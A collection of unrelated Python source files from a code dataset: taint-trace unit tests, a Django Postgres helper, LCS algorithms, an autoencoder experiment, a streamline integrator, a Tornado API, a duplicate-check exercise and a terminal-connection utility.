the\n# LICENSE file in the root directory of this source tree.\n\nimport unittest\nfrom typing import Any, List\nfrom unittest import TestCase\n\nfrom ...db import DB, DBType\nfrom ...models import (\n DBID,\n SharedText,\n SharedTextKind,\n TraceFrameLeafAssoc,\n create as create_models,\n)\nfrom ...tests.fake_object_generator import FakeObjectGenerator\nfrom .. import trace as trace_module\nfrom ..trace import LeafLookup, TraceFrameQueryResult\n\n\nclass QueryTest(TestCase):\n def setUp(self) -> None:\n self.db = DB(DBType.MEMORY)\n create_models(self.db)\n self.fakes = FakeObjectGenerator()\n\n # pyre-fixme[3]: Return annotation cannot contain `Any`.\n def _basic_trace_frames(self) -> List[Any]:\n return [\n self.fakes.precondition(\n caller=\"call1\",\n caller_port=\"root\",\n callee=\"call2\",\n callee_port=\"param0\",\n location=(1, 1, 1),\n ),\n self.fakes.precondition(\n caller=\"call2\",\n caller_port=\"param0\",\n callee=\"leaf\",\n callee_port=\"sink\",\n location=(1, 2, 1),\n ),\n ]\n\n def testLeafLookup(self) -> None:\n shared_texts = [\n SharedText(id=DBID(1), contents=\"source1\", kind=SharedTextKind.SOURCE),\n SharedText(id=DBID(2), contents=\"source2\", kind=SharedTextKind.SOURCE),\n SharedText(id=DBID(3), contents=\"source3\", kind=SharedTextKind.SOURCE),\n SharedText(id=DBID(4), contents=\"sink4\", kind=SharedTextKind.SINK),\n SharedText(id=DBID(5), contents=\"sink5\", kind=SharedTextKind.SINK),\n ]\n with self.db.make_session() as session:\n for shared_text in shared_texts:\n session.add(shared_text)\n session.commit()\n\n leaf_lookup = LeafLookup.create(session)\n\n self.assertEqual(\n leaf_lookup.resolve([1, 2], SharedTextKind.SOURCE),\n {\"source1\", \"source2\"},\n )\n self.assertEqual(\n leaf_lookup.resolve([3], SharedTextKind.SOURCE),\n {\"source3\"},\n )\n self.assertEqual(\n leaf_lookup.resolve([4, 5], SharedTextKind.SINK),\n {\"sink4\", \"sink5\"},\n )\n\n def testNextTraceFrames(self) -> None:\n run = self.fakes.run()\n frames = self._basic_trace_frames()\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add(\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n )\n )\n self.fakes.save_all(self.db)\n\n with 
self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n next_frames = trace_module.next_frames(session, frames[0], {\"sink1\"}, set())\n self.assertEqual(len(next_frames), 1)\n self.assertEqual(int(next_frames[0].id), int(frames[1].id))\n\n def testNextTraceFramesBackwards(self) -> None:\n run = self.fakes.run()\n frames = [\n self.fakes.precondition(\n caller=\"call1\",\n caller_port=\"root\",\n callee=\"call3\",\n callee_port=\"param1\",\n location=(1, 1, 1),\n ),\n self.fakes.precondition(\n caller=\"call3\",\n caller_port=\"param1\",\n callee=\"leaf\",\n callee_port=\"sink\",\n location=(1, 2, 1),\n ),\n ]\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add_all(\n [\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[0].id, leaf_id=sink.id, trace_length=1\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n ),\n ]\n )\n self.fakes.save_all(self.db)\n\n with self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n next_frames = trace_module.next_frames(\n session, frames[1], {\"sink1\"}, set(), backwards=True\n )\n\n self.assertEqual(len(next_frames), 1)\n self.assertEqual(int(next_frames[0].id), int(frames[0].id))\n\n def testNextTraceFramesMultipleRuns(self) -> None:\n run1 = self.fakes.run()\n frames = self._basic_trace_frames()\n self.fakes.save_all(self.db)\n\n run2 = self.fakes.run()\n frames.extend(self._basic_trace_frames())\n\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add_all(\n [\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=0\n ),\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[3].id, leaf_id=sink.id, trace_length=0\n ),\n ]\n )\n self.fakes.save_all(self.db)\n\n with self.db.make_session() as session:\n session.add(run1)\n session.add(run2)\n session.commit()\n\n next_frames = trace_module.next_frames(session, frames[2], {\"sink1\"}, set())\n self.assertEqual(len(next_frames), 1)\n self.assertEqual(int(next_frames[0].id), int(frames[3].id))\n\n @unittest.skip(\"T71492980\")\n def testNavigateTraceFrames(self) -> None:\n run = self.fakes.run()\n frames = self._basic_trace_frames()\n sink = self.fakes.sink(\"sink1\")\n self.fakes.saver.add(\n TraceFrameLeafAssoc.Record(\n trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n )\n )\n self.fakes.save_all(self.db)\n with self.db.make_session() as session:\n session.add(run)\n session.commit()\n\n result = trace_module.navigate_trace_frames(\n session,\n [TraceFrameQueryResult.from_record(frames[0])],\n set(),\n {\"sink1\"},\n )\n self.assertEqual(len(result), 2)\n self.assertEqual(int(result[0][0].id), int(frames[0].id))\n self.assertEqual(int(result[1][0].id), int(frames[1].id))\n\n @unittest.skip(\"T71492980\")\n def testNavigateTraceFramesDetectsCycle(self) -> None:\n \"\"\"This test checks that we don't get stuck in a cycle. Without cycle\n detection code, this test will go from 1->2->1->2->... . 
With cycle\n        detection code it goes 1->2->3->4.\n        \"\"\"\n        run = self.fakes.run()\n        frames = [\n            self.fakes.precondition(\n                caller=\"call1\",\n                caller_port=\"param1\",\n                callee=\"call2\",\n                callee_port=\"param2\",\n            ),\n            self.fakes.precondition(\n                caller=\"call2\",\n                caller_port=\"param2\",\n                callee=\"call1\",\n                callee_port=\"param1\",\n            ),\n            self.fakes.precondition(\n                caller=\"call1\",\n                caller_port=\"param1\",\n                callee=\"call3\",\n                callee_port=\"param3\",\n            ),\n            self.fakes.precondition(\n                caller=\"call3\", caller_port=\"param3\", callee=\"leaf\", callee_port=\"sink\"\n            ),\n        ]\n        sink = self.fakes.sink(\"sink\")\n        self.fakes.saver.add_all(\n            [\n                # This trace_length 0 is part of a bug.\n                # See models.py:TraceFrameLeafAssoc.trace_length\n                TraceFrameLeafAssoc.Record(\n                    trace_frame_id=frames[0].id, leaf_id=sink.id, trace_length=0\n                ),\n                TraceFrameLeafAssoc.Record(\n                    trace_frame_id=frames[1].id, leaf_id=sink.id, trace_length=1\n                ),\n                TraceFrameLeafAssoc.Record(\n                    trace_frame_id=frames[2].id, leaf_id=sink.id, trace_length=1\n                ),\n                TraceFrameLeafAssoc.Record(\n                    trace_frame_id=frames[3].id, leaf_id=sink.id, trace_length=0\n                ),\n            ]\n        )\n\n        self.fakes.save_all(self.db)\n\n        with self.db.make_session() as session:\n            session.add(run)\n            session.commit()\n\n            result = trace_module.navigate_trace_frames(\n                session,\n                [TraceFrameQueryResult.from_record(frames[0])],\n                set(),\n                {\"sink\"},\n            )\n            self.assertEqual(len(frames), 4)\n            self.assertNotEqual(\n                [int(frame.id) for frame, _branches in result],\n                [int(frame.id) for frame in frames],\n            )\n","sub_path":"sapp/ui/tests/trace_test.py","file_name":"trace_test.py","file_ext":"py","file_size_in_byte":8906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"187612058","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /mnt/projects/django-init/django_init/db/postgresql.py\n# Compiled at: 2020-01-15 01:24:21\n# Size of source mod 2**32: 920 bytes\nimport psycopg2\nfrom django_init.db.base import DatabaseBase\n\nclass DatabasePostgreSQL(DatabaseBase):\n    client = psycopg2\n    sql_show_dbs = 'SELECT * FROM pg_database'\n    sql_create_db = 'CREATE DATABASE %s WITH OWNER = %s'\n\n    def connect(self):\n        try:\n            self.conn = (self.client.connect)(**self.config)\n            self.conn.autocommit = True\n            self.cursor = self.conn.cursor()\n        except Exception as e:\n            print(e)\n        else:\n            print(self.msg_connect)\n\n    def create_db(self, db_name):\n        user = self.config.get('user')\n        sql = self.sql_create_db % (db_name, user)\n        try:\n            self.cursor.execute(sql)\n        except Exception as e:\n            print(e)\n        else:\n            print(self.msg_create_db % db_name)","sub_path":"pycfiles/django-init-0.0.1.7.tar/postgresql.cpython-37.py","file_name":"postgresql.cpython-37.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"546360126","text":"\ndef lcs(s1,s2):\n    \n    index= -1\n    index2= -1\n    if len(s1) == 1:\n        index=0\n    if len(s2) == 1:\n        index2=0\n    if len(s1)==0 or len(s2) ==0: \n        return 0\n    if s1[index] == s2[index2]:\n        return 1 +lcs(s1[0:len(s1)-1],s2[0:len(s2)-1])\n    else:\n        return max(lcs(s1[0:len(s1)-1],s2[0:len(s2)]) , lcs(s1[0:len(s1)],s2[0:len(s2)-1]) )\n\n
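# Added example (illustrative, not from the original file): for the classic pair\n# lcs(\"ABCBDAB\", \"BDCABA\") this recursion returns 4 (one LCS is \"BCBA\").\n\n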
#######################################################Dynamic Soln########################################################\ndef lcsDp(s1,s2,string):\n    n,m=len(s1),len(s2)\n    dp_t=[[0]*(n+1) for _ in range(m+1)]\n    \n    for i in range(m):\n        for j in range(n):\n            \n            if s1[j] == s2[i]:\n                dp_t[i+1][j+1]=1+dp_t[i][j]\n            \n            else:\n                dp_t[i+1][j+1]=max(dp_t[i+1][j],dp_t[i][j+1])\n        \n    return dp_t \n\n    \n    \n######################################################Dynamic Soln########################################################\n# Dynamic programming implementation of LCS problem\n\n# Returns length of LCS for X[0..m-1], Y[0..n-1]\ndef lcs(X, Y, m, n):\n\tL = [[0 for x in range(n+1)] for x in range(m+1)]\n\n\t# Following steps build L[m+1][n+1] in bottom up fashion. Note\n\t# that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1]\n\tfor i in range(m+1):\n\t\tfor j in range(n+1):\n\t\t\tif i == 0 or j == 0:\n\t\t\t\tL[i][j] = 0\n\t\t\telif X[i-1] == Y[j-1]:\n\t\t\t\tL[i][j] = L[i-1][j-1] + 1\n\t\t\telse:\n\t\t\t\tL[i][j] = max(L[i-1][j], L[i][j-1])\n\n\t# Following code is used to print LCS\n\tindex = L[m][n]\n\n\t# Create a character array to store the lcs string\n\tlcs = [\"\"] * (index+1)\n\tlcs[index] = \"\"\n\n\t# Start from the right-most-bottom-most corner and\n\t# one by one store characters in lcs[]\n\ti = m\n\tj = n\n\twhile i > 0 and j > 0:\n\n\t\t# If current character in X[] and Y are same, then\n\t\t# current character is part of LCS\n\t\tif X[i-1] == Y[j-1]:\n\t\t\tlcs[index-1] = X[i-1]\n\t\t\tprint (\"\".join(lcs))\n\t\t\ti-=1\n\t\t\tj-=1\n\t\t\tindex-=1\n\n\t\t# If not same, then find the larger of two and\n\t\t# go in the direction of larger value\n\t\telif L[i-1][j] > L[i][j-1]:\n\t\t\ti-=1\n\t\telse:\n\t\t\tj-=1\n\n\tprint (\"\".join(lcs))\n\n# Driver program\nX = \"AJKEQSLOBSROFGZ \"\nY = \"OVGURWZLWVLUXTH \"\nm = len(X)\nn = len(Y)\nlcs(X, Y, m, n)\n\n# This code is contributed by BHAVYA JAIN\n","sub_path":"Dynamic programming/Lcs.py","file_name":"Lcs.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"153835348","text":"'''\nThis code investigates the use of autoencoders to improve NMF results.\nAn autoencoder is built to reduce input dimensionality before fitting an NMF model.\nAfter that, W and H are used for source separation, using Wi and Hi to disaggregate per-appliance power consumption.\nThe core idea is that with Wi and Hi obtained in the encoded space, we can reconstruct Pi in the decoded space using the decoder part of the learnt autoencoder.\nAuthor: Wesin Alves\nDate: 2017-12-22\n'''\nfrom sklearn.decomposition import NMF\nfrom sklearn.decomposition.nmf import _beta_divergence \nimport numpy as np\nfrom numpy import linalg as la\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import normalize\nimport time\nstart_time = time.time()\nimport sklearn.decomposition as decomp\nfrom keras.layers import Input, Dense, Conv1D, MaxPooling1D, UpSampling1D\nfrom keras.models import Model\n\n\n###########\n# load data\n###########\n\nwith open('../dataset/train_signal92.csv', 'rb') as f:\n\ttrain_signal = np.loadtxt(f, delimiter='\\t')\n\tf.close()\n\nwith open('../dataset/test_signalplus92.csv', 'rb') as f:\n\ttest_signalplus = np.loadtxt(f, delimiter='\\t')\n\tf.close()\n\nn_day = 92\nn_sample = 1440\nattribute = 5 # power\n\ntrain_signal = train_signal.reshape(train_signal.shape[0],1,n_day)\ntest_signalplus=test_signalplus.reshape(test_signalplus.shape[0],1,n_day)\n\nprint('**** shape of aggregate and test signal 
****')\nprint(train_signal.shape)\nprint(test_signalplus.shape)\n\n#############################\n# Disaggregate error\n# sum(l2_norm(Xi-Xi')**2 / 2)\n#############################\n\ndef disag_error(X,W,H):\n\terror = (la.norm((X-W.dot(H)),2)**2)/2\n\treturn error\n\n##################################\n# build convolutional autoencoder model\n##################################\n\n#this is the size of the encoded representation\nencoding_dim = 16\ninput_dim = n_day\n\n#this is our input placeholder\ninput_ = Input(shape=(1,input_dim))\n#encoded is the encoded representation of the input\nx = Conv1D(64, 3, activation='relu', padding='same')(input_)\nx = MaxPooling1D(2, padding='same')(x)\nx = Conv1D(encoding_dim, 3, activation='relu', padding='same')(x)\nencoded = MaxPooling1D(2, padding='same')(x)\n\n#decoded is the lossy reconstruction of the input\nx = Conv1D(16, 3, activation='relu', padding='same')(encoded)\nx = UpSampling1D(1)(x)\nx = Conv1D(32,3, activation='relu', padding='same')(x)\nx = UpSampling1D(1)(x)\ndecoded = Conv1D(input_dim,3, activation='sigmoid', padding='same')(x)\n\n# this model maps an input to its reconstruction\nconv_autoencoder = Model(input_, decoded)\n\n\n#compile the conv_autoencoder\nconv_autoencoder.compile(optimizer='adam', \n\t\t\t\t\t\tloss='mean_squared_error',\n\t\t\t\t\t\tmetrics=['accuracy'])\n\nconv_autoencoder.summary()\n\n#this model maps an input to its encoded representation\nencoder = Model(input_, encoded)\n\n#create a placeholder for an encoded (encoding_dim-dimensional) input\nencoded_input = Input(shape=(1,encoding_dim))\n#retrieve the decoder layers of the conv_autoencoder model\ndecoder_layer1 = conv_autoencoder.layers[-5]\ndecoder_layer2 = conv_autoencoder.layers[-4]\ndecoder_layer3 = conv_autoencoder.layers[-3]\ndecoder_layer4 = conv_autoencoder.layers[-2]\ndecoder_layer5 = conv_autoencoder.layers[-1]\n\ndecoder_layer = decoder_layer5(decoder_layer4(\n\t\t\t\t\tdecoder_layer3(decoder_layer2(\n\t\t\t\t\t\tdecoder_layer1(encoded_input)))))\n\n#create the decoder model\ndecoder = Model(encoded_input, decoder_layer)\n\n###################\n# train autoencoder\n###################\n\n\nconv_autoencoder.fit(train_signal,train_signal,epochs=50,\n\tbatch_size=128,\n\tshuffle=True,\n\tvalidation_data=(test_signalplus,test_signalplus))\n\n######################\n# evaluate autoencoder\n######################\n\nscore = conv_autoencoder.evaluate(test_signalplus, test_signalplus, verbose=0)\nprint('*'*5,'evaluate conv_autoencoder','*'*5)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n'''\n################\n# encoder inputs\n################\n\ntest_encoded = encoder.predict(test_signal)\ntrain_encoded = encoder.predict(aggregate_signal)\n\n\n################\n# build nmf model\n################\n\nalpha = 0.012\nmodel = NMF(n_components = encoding_dim, init = 'random', max_iter=500, solver='cd')\n\n#################\n# train nmf model\n#################\nprint('*'*5,'evaluate NMF','*'*5)\nW = model.fit_transform(train_encoded)\ntrain_error = disag_error(train_encoded,W,model.components_)\nprint('train error: ', train_error)\n\n####################\n# evaluate nmf model\n####################\nW_test = model.transform(test_encoded)\ntest_error = disag_error(test_encoded,W_test,model.components_)\nprint('Test error: ', test_error)\n\n#################\n# decoder outputs\n#################\n\ndecoded_signal = decoder.predict(W.dot(model.components_))\n\n##############\n# get 
accuracy\n##############\n\nprint('*'*5,'evaluate nmf conv_autoencoder','*'*5)\nscore = conv_autoencoder.evaluate(decoded_signal, test_signal, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n'''","sub_path":"ae_nmf2.py","file_name":"ae_nmf2.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"401019954","text":"\"\"\"\nSubmodule for generating streamlines from rasters.\n\"\"\"\n\nfrom math import ceil, sqrt\n\ndef interpolate1(x, y, a, b, c, d):\n \"\"\" Return a value *v(x,y)* in the regular structured stencil\n\n a --- b\n | v |\n c --- d\n\n using linear interpolation. The coordinates (x, y) must be normalized by\n the horizontal and vertical grid spacings, respectively.\n \"\"\"\n left = (c-a)*y + a\n right = (d-b)*y + b\n return (right - left) * x + left\n\n\ndef streamline2d(U, V, x0, y0, ds=0.5, max_nodes=5000, res=(1.0, 1.0),\n tol=None, momentum=False):\n \"\"\" Integrate velocity field (*U*, *V*) using a 4th-order Runge-Kutta\n scheme, starting from *x0*, *y0*. A pair of lists with coordinates\n in X and Y is returned.\n\n *ds* is the step size\n\n *max_nodes* is the maximum number of steps to take. Iteration will be\n terminated automatically if the streamline reaches the edge of the vector\n field.\n\n *res* is the resolution of *U*, *V* in the same units as *x0*, *y0*.\n\n *tol* is the tolerance threshold, below which a streamline is considered\n stationary and aborted.\n\n *momentum* allows a streamline to continue moving across a plateau. (not\n implemented)\n \"\"\"\n\n m, n = U.shape\n\n # Initialize streamline vectors\n X = [x0]\n Y = [y0]\n\n # Adjust the input arrays to make them have resolution 1x1\n U = U / res[0]\n V = V / res[1]\n\n # Put x0, y0 into grid units\n x0 = x0 / res[0]\n y0 = y0 / res[1]\n\n # Check that x0, y0 are within the bounds of U, V\n if (x0 >= n-1) or (y0 >= m-1) or (x0 < 0) or (y0 < 0):\n raise IndexError(\"starting position is outside vector field\")\n\n i = 0\n\n while i < max_nodes:\n\n try:\n\n # Use linear interpolation to find dx/ds and dy/ds at (x0, y0)\n dxds = interpolate1(x0 % 1.0, y0 % 1.0,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0, y0 % 1.0,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k1x = ds * dxds\n k1y = ds * dyds\n\n dxds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k1x,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k1y,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k2x = ds * dxds\n k2y = ds * dyds\n\n dxds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k2x,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k2y,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k3x = ds * dxds\n k3y = ds * dyds\n\n dxds = interpolate1(x0 % 1.0 + ds, y0 % 1.0 + k3x,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0 + ds, y0 % 1.0 + k3y,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k4x = ds * dxds\n k4y = ds * dyds\n\n x0 = x0 + k1x/6.0 + k2x/3.0 + k3x/3.0 + k4x/6.0\n y0 = y0 + k1y/6.0 + k2y/3.0 + k3y/3.0 + k4y/6.0\n\n except IndexError: # x0 or y0 was an invalid (e.g. 
nan)\n break\n\n # Check that x0, y0 are within the bounds of U, V\n if (x0 >= n-1) or (y0 >= m-1) or (x0 < 0) or (y0 < 0):\n break\n\n X.append(x0*res[0])\n Y.append(y0*res[1])\n\n # Check that rate of change is greater than the tolerance limit\n if tol is not None:\n if sqrt( k4x**2 + k4y**2 ) < tol:\n break\n\n i += 1\n\n return X, Y\n\n\n","sub_path":"karta/raster/streamline.py","file_name":"streamline.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"421971542","text":"import os\nfrom tornado import ioloop,web\nfrom pymongo import MongoClient\nimport json\nfrom bson import json_util\nfrom bson.objectid import ObjectId\nfrom model.user import User\n\nMONGODB_DB_URL = 'mongodb://localhost:27017/'\nMONGODB_DB_NAME = 'evento'\n\nclient = MongoClient(MONGODB_DB_URL)\ndb = client[MONGODB_DB_NAME]\n\nclass IndexHandler(web.RequestHandler):\n\tdef get(self):\n\t\tself.render(\"index.html\")\n\nclass UsersHandler(web.RequestHandler):\n\t\n\tdef get(self):\n\t\tusers = User()\n\t\tself.set_header(\"Content-Type\", \"application/json\")\n\t\tself.write(json.dumps(list(users),default=json_util.default))\n\n\tdef post(self):\n\t\tuser_data = json.loads(self.request.body.decode('utf-8'))\n\t\tuser_id = db['usuarios'].insert(user_data)\n\t\tprint('user created with id ' + str(user_id))\n\t\tself.set_header(\"Content-Type\", \"application/json\")\n\t\tself.set_status(201)\n\nsettings = {\n \"template_path\": os.path.join(os.path.dirname(__file__), \"templates\"),\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"debug\" : True\n}\n\napplication = web.Application([\n\t(r'/', IndexHandler),\n\t(r'/index', IndexHandler),\n\t(r'/api/v1/users',UsersHandler),\n\t\n],**settings)\n\nif __name__ == \"__main__\":\n\tapplication.listen(8000)\n\tioloop.IOLoop.instance().start()\n","sub_path":"tornadoapp.py","file_name":"tornadoapp.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"341776427","text":"\"\"\"\nGiven an array of integers, find if the array contains any duplicates.\n\nYour function should return true if any value appears at least twice in the array, and it should return false if every element is distinct.\n\nExample 1:\n Input: [1,2,3,1]\n Output: true\n\n\nExample 2:\n Input: [1,2,3,4]\n Output: false\n\nExample 3:\n Input: [1,1,1,3,3,4,3,2,4,2]\n Output: true\n\"\"\"\n\ndef containsDuplicate(nums):\n is_contain = False\n unique = set()\n for num in nums:\n if num in unique:\n is_contain = True\n break\n else:\n unique.add(num)\n return is_contain\n\ninput1 = [1,2,3,1]\ninput2 = [1,2,3,4]\ninput3 = [1,1,1,3,3,4,3,2,4,2]\n\nprint(containsDuplicate(input3))\n","sub_path":"LeetCode-Python/217 Contains Duplicate.py","file_name":"217 Contains Duplicate.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535298928","text":"import logging\nimport re\nimport socket\nimport time\n\nfrom test_envi.connections import constants, decorators\n\nfrom io import StringIO\n\nfrom test_envi.utils.strings import escape_string\nfrom . import shells\nfrom .. 
import settings, expect, exceptions, base\nfrom ..base import mixins\nfrom test_envi import utils\n\n\nlog = logging.getLogger(__name__)\n\n__author__ = 'Filinto Duran (duranto@gmail.com)'\n\nPASSWORD_PROMPT_REGEX = r'(?i)password[^:]*:'\n\ndef _remove_cmd_from_buffer(buff, cmd_line_counter, cmd_lines, cmd_lines_num, cmd_removed):\n \"\"\" helper function for _expect_cmd \"\"\"\n for cmd_line in cmd_lines[cmd_line_counter:]:\n command_at = buff.find(cmd_line)\n if command_at != -1:\n cmd_line_counter += 1\n buff = buff[command_at + len(cmd_line):]\n if cmd_line_counter == cmd_lines_num:\n cmd_removed = True\n\n return buff, cmd_removed\n\n\ndef _get_string_to_match(buff, _check_match):\n string_to_match = buff\n\n # we are limiting the comparison to sections between the reset_on_sep char value (like new line)\n nl_index = buff.find('\\n')\n # if we find a separator string/char\n while nl_index != -1:\n string_to_match = buff[:nl_index]\n # buff is initialized with the section after the reset_on_sep char for comparison\n buff = buff[nl_index + 1:]\n # compare against our expected values\n if _check_match(string_to_match):\n break\n\n nl_index = buff.find('\\n')\n else: # nobreak\n return string_to_match, buff, False\n\n return None, None, True\n\n\nclass TerminalConnection(base.Connection, mixins.CanExecuteCommands):\n \"\"\" utility class to handle interactive connections with expect-like functionality and login tracking \"\"\"\n\n def __init__(self, connections=(), close_base_on_exit=True, allow_non_expected_prompt=False, stderr_to_tmp=False,\n rtt=0.5, check_same_prompt_when_opening_terminal=True, **shell_kwargs):\n \"\"\"\n\n Args:\n base_conn (channel.TerminalChannel):\n close_base_on_exit:\n allow_non_expected_prompt:\n stderr_to_tmp:\n rtt:\n\n Returns:\n\n \"\"\"\n if connections and not hasattr(connections, '__iter__'):\n connections = [connections]\n\n self._terminals = [] # hackish - dummy shell object to get pass the super init\n self.__base_chan_kwargs = shell_kwargs\n super(TerminalConnection, self).__init__()\n\n self.check_same_prompt_when_opening_terminal = check_same_prompt_when_opening_terminal\n self.connections = list(connections)\n self._close_base_on_exit = close_base_on_exit\n\n self.stderr_to_tmp = stderr_to_tmp\n self.allow_non_expected_prompt = allow_non_expected_prompt\n\n # last command sent\n self.last_cmd_sent = ''\n\n # time between sent and receive data. 
some cmds are more computationally intensive\n self.rtt = rtt\n\n self.sleep_time_after_no_data = 0.1\n\n def __repr__(self):\n base_conn = []\n\n for c in self.connections:\n base_conn.append(c.__repr__())\n\n return (\"TerminalConnection({base_conn}, close_base_on_exit={close_on_exit}, \"\n \"allow_unknown_prompt={allow_prompt}, stderr_to_tmp={stderr}, rtt={rtt}\".format(\n base_conn=base_conn, close_on_exit=self._close_base_on_exit,\n allow_prompt=self.allow_non_expected_prompt, stderr=self.stderr_to_tmp, rtt=self.rtt))\n\n def _open_transport(self, **kwargs):\n try:\n self.connections[0].open()\n kwargs = utils.lists.setdefault(kwargs, self.__base_chan_kwargs)\n self._transport = self.connections[0].open_terminal_channel(**kwargs)\n self._transport.set_keepalive(settings.SOCKET_KEEPALIVE_PERIOD)\n self.find_login_info(self._transport)\n # multi level login\n for conn in self.connections[1:]:\n self.open_terminal_from_terminal(conn)\n time.sleep(0.05)\n except exceptions.ConnectionError:\n self._close_transport()\n log.exception('problems connecting...')\n raise\n \n if self.allow_non_expected_prompt:\n self.connections[0].expected_prompt = self._terminals[0].shell.prompt\n\n def open_terminal_from_terminal(self, conn, **kwargs):\n terminal = conn.open_terminal_from_terminal(self, **kwargs)\n self.find_login_info(terminal)\n\n def _close_transport(self):\n try:\n self.last_cmd_sent = ''\n self._terminals = []\n if self._transport:\n self._transport.close()\n if self._close_base_on_exit:\n self.connections[0].close()\n\n except Exception:\n pass\n\n # TODO: make a copy of conn to avoid overwriting conn info.... how deep???\n @decorators.must_be_close\n def through(self, conn):\n if isinstance(conn, TerminalConnection):\n self.connections = list(conn.connections) + self.connections\n else:\n self.connections.insert(0, conn)\n return self\n\n def _is_active(self):\n return self.is_open and self._transport.is_active()\n\n @property\n def os(self):\n return self.current.os\n\n @property\n def host(self):\n try:\n return self._transport.conn.host\n except AttributeError:\n log.warning('trying to get host from not opened terminal')\n return None\n\n @property\n def prompt(self):\n return self.current.shell.prompt\n\n @prompt.setter\n def prompt(self, value):\n self.current.shell.prompt = value\n\n # TODO: check if we can remove this property if we don't see any need to double new lines\n @property\n def new_line(self):\n try:\n return self.current.shell.new_line\n except Exception:\n return '\\n'\n\n @new_line.setter\n def new_line(self, value):\n self.current.shell.new_line = value\n\n @property\n def current(self):\n try:\n return self._terminals[-1]\n except Exception:\n return None\n\n @property\n def timeout(self):\n return self._timeout\n\n @timeout.setter\n def timeout(self, value):\n self._timeout = self.current.shell.timeout = value\n\n def recv(self, buffer_size=None):\n if buffer_size is None:\n buffer_size = self.buffer_size\n data = self._transport.recv(buffer_size)\n if data:\n data = utils.regex.strip_ansi_codes_from_buffer(data)\n self.data.new_received(data)\n return data\n\n def recv_wait(self, wait_for, buffer_size=None):\n data = ''\n with utils.classes.SimpleTimer(wait_for) as timer:\n while timer.has_not_expired:\n d = self.recv(buffer_size)\n if d:\n data += d\n return data\n\n def get_file(self, *args, **kwargs):\n if len(self.connections) == 1:\n return self.current.conn.get_file(*args, **kwargs)\n else:\n raise NotImplementedError(\"The multi-level connections get 
file is not implemented yet\")\n\n def get_file_via_cat(self, remote_file, local_path='', cat_cmd='cat', use_sudo=False,\n overwrite=False, timestamp=False):\n from test_envi.connections.base.mixins import get_local_path_from_remote_file\n local_path = get_local_path_from_remote_file(remote_file, local_path, overwrite, timestamp)\n with open(local_path, 'w') as f:\n self.check_output(cat_cmd + ' ' + remote_file, use_sudo=use_sudo, recv_stream=f, reset_on_new_line=True)\n\n return local_path\n\n def put_file(self, *args, **kwargs):\n if len(self.connections) == 1:\n return self.current.conn.put_file(*args, **kwargs)\n else:\n raise NotImplementedError(\"The multi-level connections put file is not implemented yet\")\n\n def get_response(self, timeout=0.1, force_ctrl_c=False):\n \"\"\"\n\n Args:\n timeout: time to wait before forcing a ctrl-c to the previous action\n\n Returns:\n\n \"\"\"\n return self.flush_recv(timeout=timeout, force_ctrl_c=force_ctrl_c).data.get_last_recv()\n\n def __get_last_line_prompt(self, data_received_lines):\n last_line = data_received_lines.pop()\n len_last_line_split = len(last_line.split())\n if len_last_line_split >= 2:\n last_line = last_line.split(maxsplit=len_last_line_split - 1)[-1]\n return last_line\n \n def _get_banner_and_prompt(self, terminal, previous_prompt=None):\n \"\"\" Get information about a new login (message of the 